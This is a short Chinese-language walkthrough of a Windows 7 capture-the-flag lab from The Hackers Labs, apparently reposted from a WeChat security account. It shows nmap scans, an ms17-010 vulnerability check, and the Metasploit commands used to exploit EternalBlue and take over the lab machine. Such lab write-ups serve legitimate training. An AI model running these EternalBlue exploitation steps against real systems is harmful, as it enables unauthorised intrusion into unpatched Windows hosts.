靶场官网地址:
https://thehackerslabs.com/
搭建靶机你就知道这是一个windows7的一个靶场
nmap 192.168.109.130 -sS -sC -sV -Pn -n --min-rate 5000
-
-p- :扫描所有端口。 (65535)
-
-sS:执行TCP SYN 扫描以快速扫描哪些端口打开。
-
-sC:使用基本识别脚本执行扫描
-
-sV:执行服务扫描
-
–min-rate 5000:我们指定端口扫描速度不低于每秒 5000 个数据包,前一个参数和这个参数使扫描花费的时间更短。
-
-n:不执行 DNS 解析,我们防止扫描时间超过必要的时间。
-
-Pn:我们通过 ping 禁用主机发现。
扫描到一个445端口,进行脚本探测看他是否有windows经典的永恒之蓝漏洞
2017年5月,名为WannaCry的Rasomware被检测到,该恶意软件利用EternalBlue漏洞通过连接到内部相关设备的网络进行传播,其造成巨大影响的原因主要是由于所有Windows设备和补丁都存在该漏洞。在发现漏洞数小时后尚未发布,今天我们将检测计算机是否存在漏洞,并演示利用此漏洞是多么容易。
nmap 192.168.109.130 -p 445,139,135 --script smb-vuln-ms17-010
-
--script smb-vuln-ms17-010 扫描是否有 ms17-010这个漏洞
证明了他有个永恒之蓝的漏洞
命令:
msfconsole
search ms17-010
use 0
set rhost 192.168.109.130
run
成功拿到这个权限
寻找flag,全都在两个用户底下
通过搭建靶机时给的提示,就可以自然而然的想到一些Nday漏洞,当然,在猜测这些漏洞的同时也需要去做一些验证。譬如通过对它的端口特征进行勘察等等。
注:鼎星安全有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。
原文始发于微信公众号(鼎新安全):The Hackers Labs MICROCHOFT靶场
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论